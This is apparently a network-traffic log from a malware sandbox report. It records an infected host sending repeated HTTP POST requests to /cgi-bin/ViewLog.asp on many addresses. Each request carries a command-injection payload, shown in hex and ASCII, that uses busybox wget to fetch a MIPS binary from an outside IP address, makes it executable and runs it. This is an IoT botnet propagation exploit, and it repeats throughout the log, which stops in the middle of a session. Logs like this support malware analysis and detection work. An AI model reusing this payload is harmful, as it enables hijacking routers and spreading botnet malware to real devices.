                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              653192.168.2.145691662.117.37.2268080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.386533022 CET163INHTTP/1.0 400 Bad Request
                                              Server: tinyproxy/1.8.2
                                              Content-Type: text/html
                                              Connection: close


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              654192.168.2.144130831.136.228.508080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.426126957 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:06.465334892 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.613075972 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              655192.168.2.144325631.200.40.2088080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.459724903 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              656192.168.2.145972494.121.152.2328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.484728098 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              657192.168.2.145808095.86.68.2098080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.484786034 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              658192.168.2.145805295.86.68.2098080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.484843969 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              659192.168.2.145395494.120.98.1328080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.652308941 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              660192.168.2.144352294.120.153.188080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.682843924 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              661192.168.2.144764462.72.166.2548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.808029890 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.223556995 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              662192.168.2.143427694.253.106.88080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.809520006 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.028028011 CET378INHTTP/1.1 404 Not Found
                                              Server: nginx/1.14.0
                                              Date: Thu, 23 Nov 2023 04:18:03 GMT
                                              Content-Type: text/html
                                              Content-Length: 169
                                              Connection: keep-alive
                                              Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                              Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0</center></body></html>


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              663192.168.2.143697494.121.185.348080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.813313961 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              664192.168.2.144928831.136.138.1408080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.835031986 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:04.385431051 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:05.505408049 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:07.745289087 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:12.353260994 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel
                                              Nov 23, 2023 05:18:21.312848091 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              665192.168.2.145184262.29.85.1178080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:03.905395031 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              666192.168.2.143566831.200.0.2258080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:04.487061977 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              667192.168.2.144003694.122.78.1358080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:04.684161901 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              668192.168.2.144767862.72.166.2548080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:04.775540113 CET416OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
                                              Data Raw: 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 30 34 2e 31 36 38 2e 31 33 33 2e 35 20 2d 6c 20 2f 74 6d 70 2f 6b 68 20 2d 72 20 2f 62 69 6e 73 2f 68 6f 68 6f 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 6b 68 3b 20 2f 74 6d 70 2f 6b 68 20 7a 78 79 65 6c
                                              Data Ascii: /bin/busybox wget -g 104.168.133.5 -l /tmp/kh -r /bins/hoho.mips; /bin/busybox chmod 777 * /tmp/kh; /tmp/kh zxyel


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              669192.168.2.143945095.174.109.618080
                                              TimestampBytes transferredDirectionData
                                              Nov 23, 2023 05:18:05.008583069 CET404OUTPOST /cgi-bin/ViewLog.asp HTTP/1.1
                                              Host: 192.168.0.14:80
                                              Connection: keep-alive
                                              Accept-Encoding: gzip, deflate
                                              Accept: */*
                                              User-Agent: python-requests/2.20.0
                                              Content-Length: 227
                                              Content-Type: application/x-www-form-urlencoded
